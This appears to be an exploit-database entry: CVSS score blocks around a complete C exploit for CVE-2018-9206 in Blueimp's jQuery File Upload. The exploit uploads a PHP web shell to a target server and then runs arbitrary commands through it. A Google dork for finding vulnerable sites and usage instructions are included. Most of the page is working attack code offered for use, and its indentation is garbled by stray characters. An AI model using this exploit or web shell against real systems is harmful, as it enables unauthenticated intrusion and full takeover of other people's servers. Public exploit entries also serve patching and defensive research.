9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Blueimps jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
# Exploit Title: Exploit for Blueimp's jQuery File Upload <= 9.22.0 CVE-2018-9206
# Google Dork: inurl: /jquery-file-upload/server/php
# Date: 1/15/2019
# Exploit Author: Larry W. Cashdollar
# Vendor Homepage: http://www.vapidlabs.com
# Software Link: [download link if available]
# Version: <= 9.22.0
# Tested on: Linux
# CVE : CVE-2018-9206
/*Exploits CVE-2018-9206 to install a webshell.*/
/*http://www.vapidlabs.com/advisory.php?v=204 */
/*$ gcc main.c -o blue_exploit */
/*Larry W. Cashdollar @_larry0*/
#include <stdio.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>
#include <unistd.h>
#define BSIZE 1024
#define DEBUG 1
#define TESTONLY 0
void build_string (char *p, char *path, char *arg, char *ar1, int func);
int
main (int argc, char *argv[])
{
Ā int sock = 0, bytes_read = 0, total = 0, function = 0;
Ā struct sockaddr_in serv_addr;
Ā char buffer[BSIZE] = { 0 }, payload[BSIZE] = { 0};
Ā if (argc <= 1)
Ā Ā {
Ā Ā Ā printf
("CVE-2018-9206 Exploit\n@_larry0\nUsage: %s hostname port path command\n",
argv[0]);
Ā Ā Ā return (0);
Ā Ā }
Ā if (argc == 5)
Ā Ā function = 1;
Ā if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
Ā Ā {
Ā Ā Ā printf ("\nSocket creation error\n");
Ā Ā Ā return (-1);
Ā Ā }
Ā build_string (payload,argv[3] ,argv[1], argv[4], function);
if (!TESTONLY){
Ā memset (&serv_addr, 0, sizeof (serv_addr));
Ā serv_addr.sin_family = AF_INET;
Ā serv_addr.sin_port = htons (atoi (argv[2]));
Ā if (inet_pton (AF_INET, argv[1], &serv_addr.sin_addr) <= 0)
Ā Ā {
Ā Ā Ā printf ("\nInvalid address.\n");
Ā Ā Ā return (-1);
Ā Ā }
Ā if (connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr)) < 0)
Ā Ā {
Ā Ā Ā printf ("\nConnection Failed.\n");
Ā Ā Ā return (-1);
Ā Ā }
Ā send (sock, payload, strlen (payload), 0);
}
Ā if (DEBUG)
Ā Ā printf ("\nSending Payload:\n%s", payload);
if (!TESTONLY) {
Ā while (1)
Ā Ā {
Ā Ā Ā bytes_read = recv (sock, buffer, BSIZE, 0);
Ā Ā Ā total += bytes_read;
Ā Ā Ā if (bytes_read <= 0)
break;
Ā Ā Ā printf ("%s", buffer);
Ā Ā Ā bzero (buffer, BSIZE);
Ā Ā }
Ā printf ("\n[+] Total bytes read: %d\n", total);
Ā close (sock);
}
Ā return (0);
}
void
build_string (char *p, char *path,char *arg, char *ar1, int func)
{
Ā if (func)
Ā Ā Ā snprintf (p, BSIZE,
"GET /%s/files/shell.php?cmd=%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\n\r\n", path,ar1, arg);
Ā else
Ā Ā snprintf (p, BSIZE,
Ā Ā Ā "POST /%s/index.php HTTP/1.1\r\nHost: %s\r\nUser-Agent: blueimp jquery exploit/9.22.0\r\nAccept: */*\r\nContent-Length: 244\r\nContent-Type: multipart/form-data; boundary=------------------------c8e05c8871143853\r\n\r\n--------------------------c8e05c8871143853\r\nContent-Disposition: form-data; name=\"files\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php $cmd=$_GET['cmd']; system($cmd);?>\r\n\r\n--------------------------c8e05c8871143853--\r\n\r\n",path, arg);
}
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P